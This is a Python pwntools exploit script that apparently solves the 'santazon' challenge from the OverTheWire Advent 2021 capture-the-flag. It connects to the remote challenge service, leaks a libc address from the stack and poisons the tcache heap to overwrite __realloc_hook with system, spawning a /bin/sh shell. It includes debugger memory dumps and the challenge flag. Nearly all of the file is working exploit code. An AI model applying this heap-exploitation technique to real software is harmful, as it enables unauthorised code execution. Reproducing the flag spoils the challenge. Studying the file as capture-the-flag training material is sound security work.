from pwn import *
# Verbose pwntools logging: every send/recv on the connection is echoed to the console.
context.log_level = 'debug'
# Terminal command pwntools uses when it opens a new window (e.g. for a debugger attach).
context.terminal = ['tmux', 'splitw', '-h']
# NOTE(review): `file` and `bin` shadow Python builtins (`file` on Python 2, `bin` on both).
file = "./santazon"
bin = ELF(file)
# Local copy of the target's libc; `libc.address` is set later from the leaked value.
libc = ELF("./libc.so.6")
# Local-process variant kept for debugging; the script is wired to the remote instance.
#conn = process(file)
conn = remote("santazon.advent2021.overthewire.org", 1210)
def menu(choice):
    """Wait for the service's menu prompt, then send *choice* as one line.

    Uses the module-level connection `conn`. "mnput" is presumably the tail of
    the prompt text printed before a menu selection is read — verify against
    the service output.
    """
    conn.recvuntil("mnput")
    conn.sendline(choice)
def gift(s):
    """Pick the "gift" menu option and send *s* as the gift contents.

    *s* is sent raw (no trailing newline) once the "gift" prompt has appeared.
    """
    menu("gift")
    conn.recvuntil("gift")
    conn.send(s)
def wrap(idx, s):
    """Pick the "wrap" menu option for slot *idx* and send *s* as its new contents.

    The index is sent as a line after the "mndex" prompt; *s* is sent raw
    (no trailing newline) after the "gift" prompt.
    """
    menu("wrap")
    conn.recvuntil("mndex")
    conn.sendline(str(idx))
    conn.recvuntil("gift")
    conn.send(s)
def return_gift(idx):
    """Pick the "return" menu option for slot *idx* (index sent after the "mndex" prompt)."""
    menu("return")
    conn.recvuntil("mndex")
    conn.sendline(str(idx))
def open(idx):
    """Pick the "open" menu option for slot *idx* (index sent after the "mndex" prompt).

    NOTE(review): this shadows the builtin `open`; any later file access in
    this module would call this function instead.
    """
    menu("open")
    conn.recvuntil("mndex")
    conn.sendline(str(idx))
def leak_from_stack(count):
    """Write *count* filler bytes into slot 0, open it, and decode the bytes printed after the filler.

    Presumably the "open" output echoes the slot contents; whatever follows the
    filler on that line is taken as the leaked value. Returns an int.
    """
    payload = "a"*count
    wrap(0, payload)
    open(0)
    conn.recvuntil(payload)
    # Drop the trailing newline, pad to 8 bytes, decode with u64 (context endianness).
    # NOTE(review): padding with a str fill only works on Python 2; on Python 3
    # pwntools returns bytes here and `bytes.ljust(8, "\x00")` raises TypeError.
    return u64(conn.recvline()[:-1].ljust(0x8, "\x00"))
"""
0x7ffcd8649628: 0x0000560061616161 0x0000000000000d68
[libc]
0x7ffcd8649638: 0x00007ff79df59ad1 0x00007ff79e0b26a0
0x7ffcd8649648: 0x00007ff79e0b26a0 0x00007ff79e0b34a0
[bin] [stack]
0x7ffcd8649658: 0x0000564a08cff1c0 0x00007ffcd8649800
0x7ffcd8649668: 0x0000000000000000 0x0000000000000000
0x7ffcd8649678: 0x00007ff79df575f8 0x0000564a08d00008
0x7ffcd8649688: 0x00007ff79e0b26a0 0x00007ff79e0b34a0
0x7ffcd8649698: 0x0000564a08cff2f8 0x0000000000000010
"""
libc_leak = leak_from_stack(0x8*2)
libc_base = libc_leak - 0x7f17b8456ad1 + 0x7f17b83c3000
libc.address = libc_base
# Put chunks in tcache
gift("b"*0x57)
wrap(1, "\n") # Frees the chunk
return_gift(0)
return_gift(1)
wrap(0, "c"*0x30)
wrap(1, "c"*0x30)
wrap(1, "\n")
wrap(0, "\n")
"""
Allocated chunk | PREV_INUSE
Addr: 0x555db4489000
Size: 0x291
Allocated chunk | PREV_INUSE
Addr: 0x555db4489290
Size: 0x411
Allocated chunk | PREV_INUSE
Addr: 0x555db44896a0
Size: 0x21
Allocated chunk | PREV_INUSE
Addr: 0x555db44896c0
Size: 0x1011
Free chunk (tcache) | PREV_INUSE <-- Overflow this chunk
Addr: 0x555db448a6d0
Size: 0x61
fd: 0x00
Free chunk (tcache) | PREV_INUSE
Addr: 0x555db448a730
Size: 0x41
fd: 0x555db448a780 <-- Overwrite this fd pointer
Free chunk (tcache) | PREV_INUSE
Addr: 0x555db448a770
Size: 0x41
fd: 0x00
Top chunk | PREV_INUSE
Addr: 0x555db448a7b0
Size: 0x1f851
"""
# Clear pointers, so we do fresh allocations
return_gift(0)
return_gift(1)
payload = "e"*0x60 + p64(libc.symbols['__realloc_hook'])
wrap(0, payload.ljust(120, "\x00")) # Fill stack with our payload
wrap(1, "f"*0x58)
# Try to get an allocation on realloc
return_gift(0)
return_gift(1)
wrap(0, "/bin/sh".ljust(0x37, "\x00"))
log.info("System: " + hex(libc.symbols['system']))
wrap(1, p64(libc.symbols['system']).ljust(0x36, "\x00")) # Overwrite realloc hook
wrap(0, "h"*0x34) # Trigger shell!
log.info("Libc leak: " + hex(libc_leak))
# AOTW{m0_pr3s3ntz_m0_pr0bl3mz}
conn.interactive()